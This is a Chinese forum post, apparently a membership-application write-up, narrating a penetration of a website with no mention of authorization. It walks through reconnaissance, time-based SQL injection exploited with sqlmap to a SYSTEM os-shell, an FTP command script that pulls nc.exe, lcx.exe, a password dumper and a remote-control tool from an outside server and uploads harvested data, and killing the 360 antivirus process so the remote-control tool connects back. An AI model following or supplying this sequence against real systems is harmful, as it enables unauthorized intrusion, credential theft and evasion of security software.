前言:
想转正已久,苦于没有 可以上手的文章. 一次小的渗透案例,望通过
0x01 信息收集
小访问一下
随意加个不存在的页面,看报错,支持aspx
找个url测试看看 ,aspx 估计是mssql
and 1=1 报错, 没有安全软件拦截,判断没有安全狗等等防护软件
猜了几个后台,无果 iis
layer 查子域
ping 检测 根据子域信息,应该没有cdn
微步在线,查 历史解析,whois
nmap 扫端口
逐一访问
--
访问1011 端口,跳转到管理页面
在主战,找到一些可疑连接
访问得到一些内网信息
信息收集总结:
还有的连接需要http 401 验证
访问1001端口时,自动跳转管理页面
不同端口上开发着不同的web容器.(web应用)
iis nginx romcat apache
支持 php aspx asp jsp
域名注册人邮箱
有hfs 等等服务
判断 突破口很多,服务器安全做的不算好
结合一些信息 去findmi上查找泄露的密码
这里就不截图了
之后进行 弱口令一波,未果
手动对一些url 进行测试 是否存在注入,这里也不截图,因为好几个端口都有web服务.量很大
0x02 利用漏洞扫描工具扫描
awvs
有延时注入
--
手动验证一下 ,存在延时注入
0x03 漏洞利用
上sqlmap
--current-user
sa权限
直接osshell
system权限
执行
ipconfig
netstat -nao
查看是内网,未开发80服务, 端口情况和nmap扫描不符合
判断站库分离
图片忘记截了
因为是站库分离,直接写shell是不行了
我尝试直接写远控到c盘,再os-shell执行
未果
----------
陷入瓶颈后,找基友帮忙,
突破口 ftp
利用ftp 远程下载文件
2003 没有powershell 所以pass
先收集一下信息, 重定向到一个txt文件
因为如果直接回显,太慢了
解决ftp 交互式问题,
先建立一个文件,写入
open ftp服务器地址
user
pass
prompt 开启静默模式
get 360.exe
get nc.exe
get lcx.exe
get getpass.exe
put xy.txt
quit
具体看图
之后 ftp -s:文件 执行
回到ftp,在ftp上看到xy.txt ,说明思路成功
直接os-shell执行远控,未果
下载xy.txt 文件 ,
看到有360 ,果断
taskkill /F /IM PID 结束360
之后再执行
成功上线
内网渗透并怎么会,
web服务器现在正在努力测试,以期望拿下
--------------------------------------------end
总结:
基础和思路 很重要
ps: 望通过
=============================
超过十位正式成员同意,转正成功。
管理05
|